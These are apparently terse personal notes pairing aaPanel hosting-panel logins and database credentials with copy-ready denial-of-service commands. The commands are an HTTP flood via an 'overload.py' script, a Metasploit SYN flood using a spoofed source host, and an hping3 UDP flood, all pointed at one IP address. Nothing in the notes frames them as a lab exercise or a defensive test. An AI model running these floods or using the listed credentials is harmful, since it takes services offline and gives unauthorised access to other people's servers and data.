aaPanel Internet Address: http://14.169.188.71:7800/810140af
aaPanel Internal Address: http://192.168.255.132:7800/810140af/
username: f6ivrzyw
password: 0a1678a6

HTTP FLOOD 

python3 overload.py --time 5000 --threads 10000 --target http://192.168.255.132/ --method HTTP
py overload.py --time 5000 --threads 10000 --target http://192.168.255.132/ --method HTTP

SYN FLOOD

nmap 21 192.168.255.132
msfconsole 
use auxiliary/dos/tcp/synflood
set RHOST 192.168.255.132
set RPORT 21
set SHOST 10.0.0.1
exploit

UDP FLOOD
hping3 -2 --flood 192.168.255.132



Database name：sql_192_168_255_

User：sql_192_168_255_

Password：j6Lmder5GTbbjBNX